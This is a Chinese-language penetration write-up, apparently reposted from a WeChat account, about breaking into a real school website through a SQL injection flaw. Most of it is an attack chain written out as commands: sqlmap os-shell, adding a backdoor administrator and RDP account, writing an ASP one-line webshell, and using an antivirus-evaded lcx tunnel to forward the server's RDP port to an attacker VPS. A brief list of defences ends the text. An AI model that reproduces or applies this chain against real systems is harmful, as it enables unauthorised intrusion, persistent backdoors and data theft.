在实际工作过程中,通过对一个目标的扫描,有可能出来很多子站点及其相关站点的扫描,通过awvs可以对多个目标的扫描,很多漏洞扫描软件,也不是商业扫描软件可以对多个目标继续扫描,其扫描过程跟单个目标的扫描过程类似,漏洞软件仅仅是做了一个多任务或者批量处理而已,最关键的地方在于对扫描结果的综合利用,在本例中主要介绍在涉及内网的情况下,如果通过lcx等工具来进行突破,虽然互联网上有很多代理穿透软件,但这些代理穿透脚本多为aspx、php和jsp,对asp的暂时没有支持。
1.1发现并测试SQL注入漏洞
1.sql注入漏洞发现思路
(1)通过AWVS等扫描工具对目标站点进行扫描。扫描结束后会提示,查看扫描结果,其中sql注入会以高危及红色提示信息显示。
(2)burpsuite抓包测试。通过burpsuite对目标网站进行抓包测试,在头文件或者post包中进行sql注入手工或自动测试。
(3)手工目测。浏览网站页面,对于有注入存在的地方一般有参数传入,例如“id=”等参数,将存在参数的网站地址放在sqlmap中进行自动测试。
2.发现目标站点sql注入点
通过对上海某大的某一个附属中学的网站进行访问,发现其中存在一个id参数,手工测试该url,发现存在报错,猜测其存在SQL注入点的可能性极大。
3.使用sqlmap进行注入测试
sqlmap -u http://www.*****.com.cn/schoolweb/displaypic.asp?id=594,执行后,如图1所示,显示目标系统存在五种类型的注入即布尔盲注、出错注入、内联查询注入、二次注入和基于时间的盲注,目标操作系统版本为Windows 2003,数据库为SQL Server 2005。
图1对sql注入点进行测试
1.2获取Webshell及提权
1.通过sqlmap获取当前目标系统信息
sqlmap -u http://www.*****.com.cn/schoolweb/displaypic.asp?id=594 --dbs --isdba --user
通过sqlmap可以方便的获取当前数据库的一些信息,如图2所示,当前数据库账号权限为sa,SQL Server 2005数据库sa权限+Windows 2003操作系统99%可以获取服务器权限。
图2获取当前数据库用户权限
2.获取os-shell权限
执行命令sqlmap -u http://www.*****.com.cn/schoolweb/displaypic.asp?id=594 --os-shell直接获取os-shell。
(1)查看3389端口,通过该命令窗口查看服务器端口开放情况(netstat -an)发现3389端口对外开放。
(2)添加管理员权限,直接三行命令:
net user Summer Summerbure0. /add
net localgroup Administrators Summer /add
net localgroup “Remote Desktop Users” Summer /add
(3)对目标服务器进行端口扫描
使用nmap对目标服务器进行端口扫描,也可以使用“masscan -p 1-65535 ip”进行扫描,扫描结果显示,目标服务器仅仅开放80端口。
(4)查看主机网络配置,使用“ipconfig /all”命令查看网络配置,如图3所示,服务器使用的是内网地址,学校服务器一般都是内网地址!
图3内网IP地址
3.获取webshell
(1)逐个查看磁盘内容
使用dir c:等命令逐个查看磁盘文件目录及其文件,如图4所示,当查看到E盘时发现在E盘存在web等目录。网站目录一般有明显的名称属性,例如wwwroot、site等。
图4获取web目录
(2)查看网站目录
使用“dir E:web”命令继续查看web目录内容,如图5所示,可以看到有明显特征的学校网页名称schoolweb,有些目标需要多次查看目录才能获取真正的网站路径。
图5查看网站目录
(3)直接写入asp的一句话木马。
分别执行以下代码,来获取webshell及确认webshell是否成功写入网站文件,效果如图6所示。
echo ^<%execute(request(“summer”))^%> >E:webschoolweb6.asp
dir E:webschoolweb
图6写入一句话后门
4.成功获取webshell
使用中国菜刀一句话后门连接地址:http://www.*****.com.cn/schoolweb/6.asp,密码summer,如图7所示,成功获取webshell。
图7成功获取webshell
1.3突破内网进入服务器
1.使用Tunna等内网转发失败
内网服务器一般可以通过Tunna、reGeorg等进行端口转发来实现,在本次测试中未能成功。
(1)Tunna无asp脚本
如图8所示,Tunna仅仅支持jsp、php和aspx,对asp脚本编程不支持,因此无法通过Tunna进行内网转发。
图8Tunna支持三大脚本
(2)reGeorg存在同样问题
reGeorg的webshell跟Tunna类似,reDuh等都存在同样问题
2.使用lcx穿透内网
(1)在国内某云上通过学生证申请一台VPS服务器,只要1元钱。
(2)目标服务器运行lcx
将lcx进行免杀处理,上传后执行以下命令:
lcx_2.exe -slave 119.**.234.85 4500 192.168.14.106 3389,意思是连接VPS服务器119. **..234.85,内网IP地址192.168.14.106,内网端口3389转发到4500端口,如图9所示。
图9在目标服务器上运行lcx
(3)在VPS服务器上运行lcx
在vps服务器上运行 lcx.exe -listen 4500 5000,如图10所示,表示在本地监听并接收远程4500端口的数据到5000端口上。
图10vps运行lcx
(4)在本地登录3389
在本地打开mstsc,输入127.0.0.1:500,或者独立IP:5000进行登录,如图11所示,输入前面加入的用户名及密码,成功登录该服务器。
图11成功登录远程终端
1.4总结及防御
1.本次渗透总结
(1)真正的目标主机渗透成功后,突破内网进入服务器跟本地模拟环境测试有很大的不同,网上很多代理穿透软件及其脚本,在真正环境中有很大的区别,比如很多代理仅仅支持jsp、php和aspx脚本,对asp脚本根本就没有代理支持。
(2)lcx是经典内网穿透工具,掌握其两条命令即可,关键是必须有外网独立IP地址,解决该问题可以通过购买云服务器来解决。
lcx_2.exe -slave 119.29.234.85 4500 192.168.14.106 3389 //目标目标执行命令
lcx.exe -listen 4500 5000 //vps执行命令
mstsc 127.0.0.1:5000 //vps上执行
(3)sqlmap功能强大,可以解决很多实际问题。
在普通asp+SQL Server 2005环境需要开启xp_cmdshell存储进程,在sqlmap中通过os-shell直接可以解决,非常方便。
2.安全防御
(1)通过公开web漏洞扫描器对网站进行漏洞扫描,对扫描漏洞进行修复及处理。
(2)对网站代码进行审计,修复明显的sql注入等高危漏洞。
(3)严格控制网站脚本权限,网站文件上传目录有写入权限,但无脚本执行权限
(4)网站应用中,尽量使用最少数据库账号权限,一个应用一个账号。
(5)在服务器上安装杀毒软件及waf防护软件。
原文始发于微信公众号(小兵搞安全):同一站点多目标扫描及渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论